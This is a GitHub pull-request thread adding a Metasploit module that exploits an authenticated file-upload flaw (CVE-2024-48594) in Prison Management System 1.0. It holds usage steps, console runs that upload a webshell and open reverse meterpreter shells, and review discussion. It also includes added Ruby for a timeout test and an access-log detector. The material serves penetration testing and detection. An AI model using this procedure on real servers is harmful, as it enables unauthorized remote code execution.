
@Xorriath
Contributor

This module exploits CVE-2024-48594, an authenticated unrestricted file upload vulnerability in Prison Management System 1.0. An authenticated admin user can upload a PHP webshell via the avatar field in add-admin.php, leading to remote code execution.

Verification

  • Start msfconsole
  • exploit/linux/http/prison_management_rce
  • set RHOSTS <target_ip>
  • set RPORT <target_port>
  • set SSL true (if HTTPS)
  • set USERNAME admin
  • set PASSWORD admin123
  • set LHOST <your_ip>
  • run
  • Verify meterpreter session opens as www-data
  • Verify webshell gets cleaned up after exploitation

Example execution

msf exploit(linux/http/prison_management_rce) > options

Module options (exploit/linux/http/prison_management_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin123         yes       Password for authentication
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS     192.168.223.103  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Prison Management System
   USERNAME   admin            yes       Username for authentication
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.45.222   yes       The listen address (an interface may be specified)
   LPORT  9443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

msf exploit(linux/http/prison_management_rce) > run
[*] Started reverse TCP handler on 192.168.45.222:9443 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Prison Management System login page detected
[*] Attempting to authenticate as admin...
[+] Successfully authenticated!
[*] Uploading webshell as EXBCiWAs.php...
[+] Webshell uploaded to /uploadImage/Profile/EXBCiWAs.php
[*] Triggering payload execution...
[*] Sending stage (41224 bytes) to 192.168.223.103
[+] Deleted EXBCiWAs.php
[*] Meterpreter session 2 opened (192.168.45.222:9443 -> 192.168.223.103:48250) at 2025-12-26 07:15:02 +0200
meterpreter > getuid
Server username: www-data

Notes

@jvoisin
Contributor

jvoisin commented Dec 26, 2025

How many active users does this project have?

@Xorriath
Contributor Author

@jvoisin Hello, thanks for taking a look at this. It is very difficult to tell how many active users there are currently. The software was made publicly available on April 6, 2024. Since then, the page has had nearly 11,000 views. Of those views, there is no way to tell how many people installed the software and are currently using it in a commercial fashion.
https://www.sourcecodester.com/sql/17287/prison-management-system.html

If there are any other questions, please let me know.

@github-actions

github-actions bot commented Jan 5, 2026

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

'method' => 'GET',
'uri' => @webshell_path,
'keep_cookies' => true
}, 5)
Contributor


Does the timeout here need to set to 5 second?

Contributor Author


If my understanding is correct, when the uploaded .php file is requested, the response is going to "hang", but the command execution will be triggered, so we do not need the default 20-second timeout for a response that hangs.
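The behaviour discussed in the review exchange above (the request to the uploaded .php never returns because the payload keeps running, so the client only needs a short read timeout) can be reproduced without a target. The Ruby below is an added example written for this page, not code from the module or from Metasploit: a stand-in "webshell" listener on loopback that accepts a request, records the request line, and deliberately never answers, plus a client that bounds the read with a timeout and reports what happened. The function names, the sample path and the timeout values are this example's own assumptions. It also covers a caveat the thread does not mention: Net::HTTP retries an idempotent GET once after a read timeout by default, which would trigger the payload a second time, so max_retries is set to 0.

```ruby
require 'socket'
require 'net/http'

# Stand-in for the uploaded webshell (constructed for this example, not the
# module's code). It reads the request line so the caller can confirm the
# request arrived, then holds the connection open without ever writing a
# response, like a PHP payload that spawns a reverse shell and never returns.
def start_hanging_server(hits)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  held = [] # keep client sockets referenced so GC cannot close them early
  Thread.new do
    loop do
      client = server.accept
      hits << client.gets.to_s.strip # e.g. "GET /uploadImage/Profile/x.php HTTP/1.1"
      held << client                 # never answered, never closed
    end
  end
  port
end

# Request the webshell with a bounded read timeout and report the outcome.
# A :timed_out result after the request was written means the server accepted
# and read it (the payload had its chance to run); :refused means it never
# accepted at all. Elapsed time is returned so callers can see the bound held.
def trigger_webshell(host, port, path, read_timeout)
  http = Net::HTTP.new(host, port)
  http.open_timeout = 5
  http.read_timeout = read_timeout
  # Net::HTTP retries idempotent requests (GET) once on Net::ReadTimeout by
  # default; for a payload trigger that would execute the webshell twice.
  http.max_retries = 0
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  result =
    begin
      res = http.get(path)
      { outcome: :responded, code: res.code.to_i }
    rescue Net::ReadTimeout
      { outcome: :timed_out }
    rescue Errno::ECONNREFUSED
      { outcome: :refused }
    end
  result.merge(elapsed: Process.clock_gettime(Process::CLOCK_MONOTONIC) - started)
end

if $PROGRAM_NAME == __FILE__
  hits = []
  port = start_hanging_server(hits)
  result = trigger_webshell('127.0.0.1', port, '/uploadImage/Profile/EXBCiWAs.php', 1)
  puts "client saw:  #{result.inspect}"
  puts "server saw:  #{hits.inspect}"
end
```

With max_retries left at its default, the same run records two request lines on the server side and takes roughly twice the timeout; that is the behaviour to check for in any module that triggers a non-returning webshell with a GET.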

@msutovsky-r7
Contributor

Hello @Xorriath, thanks for your contribution! Would you mind adding documentation for your module?

msf exploit(linux/http/prison_management_rce) > check
[*] 10.5.132.162:80 - The service is running, but could not be validated. Prison Management System login page detected
msf exploit(linux/http/prison_management_rce) > run verbose=true 
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Prison Management System login page detected
[*] Attempting to authenticate as admin...
[*] Retrieved session cookie: PHPSESSID=uihgdhgbn1ot5a2mis55gccg3h;
[+] Successfully authenticated!
[*] Uploading webshell as cJEHEWno.php...
[+] Webshell uploaded to /uploadImage/Profile/cJEHEWno.php
[*] Triggering payload execution...
[*] Sending stage (41224 bytes) to 10.5.132.162
[+] Deleted cJEHEWno.php
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.162:33974) at 2026-01-06 10:06:21 +0100

meterpreter > sysinfo
Computer        : virt-ubuntu
OS              : Linux virt-ubuntu 6.8.0-1031-azure #36~22.04.1-Ubuntu SMP Tue Jul  1 03:54:01 UTC 2025 x86_64
Architecture    : x64
System Language : C
Meterpreter     : php/linux

@Xorriath
Contributor Author

Xorriath commented Jan 6, 2026

Hello, thank you for the code tweak suggestions and for testing the module. I have updated the PR with a new documentation commit and committed the code suggestions. Happy to add/tweak anything else if required :)

@msutovsky-r7 msutovsky-r7 self-assigned this Jan 6, 2026

@msutovsky-r7 msutovsky-r7 left a comment


msf exploit(linux/http/prison_management_rce) > run verbose=true 
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Prison Management System login page detected
[*] Attempting to authenticate as admin...
[*] Retrieved session cookie: PHPSESSID=cpc6s59rps4jq8rrqk08830ioh;
[+] Successfully authenticated!
[*] Uploading webshell as JJwtOGph.php...
[+] Webshell uploaded to /uploadImage/Profile/JJwtOGph.php
[*] Triggering payload execution...
[*] Sending stage (41224 bytes) to 10.5.132.163
[+] Deleted JJwtOGph.php
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.163:48000) at 2026-01-07 13:24:43 +0100

meterpreter > sysinfo
Computer        : virt-ubuntu
OS              : Linux virt-ubuntu 6.8.0-1031-azure #36~22.04.1-Ubuntu SMP Tue Jul  1 03:54:01 UTC 2025 x86_64
Architecture    : x64
System Language : C
Meterpreter     : php/linux

@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 8, 2026
@msutovsky-r7 msutovsky-r7 merged commit c289ff4 into rapid7:master Jan 8, 2026
19 checks passed
@msutovsky-r7
Contributor

Release Notes

This adds a new module for Prison Management System 1.0 (CVE-2024-48594). The module requires admin credentials, which are subsequently used to exploit unrestricted file upload and upload a webshell.
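As an added defensive check, not part of the PR or the module: the execution transcripts above show the trace this exploit leaves in the web server's access log even after the module deletes the webshell, namely a POST to add-admin.php followed by a request to a random-named .php file under /uploadImage/Profile/. The Ruby below parses constructed Apache combined-format log lines (sample data written for this example, not real traffic) and flags that sequence, escalating when both requests come from the same client within a short window. The constants, function names and window length are this example's own assumptions.

```ruby
require 'time'

# Constructed sample of Apache combined-format access log lines (not real
# traffic): an admin login, the add-admin.php POST that carries the avatar
# upload, the follow-up request to the uploaded PHP file, and benign noise
# from other clients that must not be flagged.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [26/Dec/2025:07:14:58 +0200] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  203.0.113.7 - - [26/Dec/2025:07:15:00 +0200] "POST /add-admin.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  203.0.113.7 - - [26/Dec/2025:07:15:01 +0200] "GET /uploadImage/Profile/EXBCiWAs.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [26/Dec/2025:07:20:11 +0200] "GET /uploadImage/Profile/avatar.png HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
  198.51.100.9 - - [26/Dec/2025:07:20:12 +0200] "POST /add-admin.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  192.0.2.44 - - [26/Dec/2025:08:01:30 +0200] "GET /uploadImage/Profile/.htaccess HTTP/1.1" 403 0 "-" "curl/8.0"
LOG

# Paths taken from the module output above; the window is an assumption.
UPLOAD_ENDPOINT = '/add-admin.php'
UPLOAD_DIR      = '/uploadImage/Profile/'
SCRIPT_EXT      = /\.(php\d?|phtml|phar)\z/i

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Parse one combined-format line into a Hash, or nil if it does not match.
def parse_line(line)
  m = LINE_RE.match(line) or return nil
  {
    ip: m[:ip],
    time: Time.strptime(m[:time], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path: m[:path].split('?').first, # drop any query string
    status: m[:status].to_i
  }
end

# Return one alert per request for a server-side script under the avatar
# directory. That alone is :medium (the directory should only ever serve
# images); it becomes :high when the same client POSTed to the upload
# endpoint within `window` seconds beforehand.
def detect_upload_rce(log_text, window: 60)
  events = log_text.each_line.filter_map { |l| parse_line(l) }
  events.filter_map do |e|
    next unless e[:path].start_with?(UPLOAD_DIR) && e[:path].match?(SCRIPT_EXT)
    alert = { ip: e[:ip], path: e[:path], time: e[:time], severity: :medium,
              reason: 'server-side script requested from avatar upload directory' }
    upload = events.find do |u|
      u[:ip] == e[:ip] && u[:method] == 'POST' && u[:path] == UPLOAD_ENDPOINT &&
        u[:time] <= e[:time] && (e[:time] - u[:time]) <= window
    end
    if upload
      alert[:severity] = :high
      alert[:reason] = "POST #{UPLOAD_ENDPOINT} at #{upload[:time].iso8601} " \
                       "followed by request to uploaded script"
    end
    alert
  end
end

if $PROGRAM_NAME == __FILE__
  detect_upload_rce(SAMPLE_LOG).each do |a|
    puts "[#{a[:severity]}] #{a[:ip]} #{a[:path]} (#{a[:reason]})"
  end
end
```

The second client's POST to add-admin.php is not flagged on its own, since legitimate admins create accounts through that page; it is the combination with a script request from the image directory that matters. The same rule can be fed from an SIEM query rather than raw lines, and a web server that refuses to execute anything under /uploadImage/ removes the :medium case entirely.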

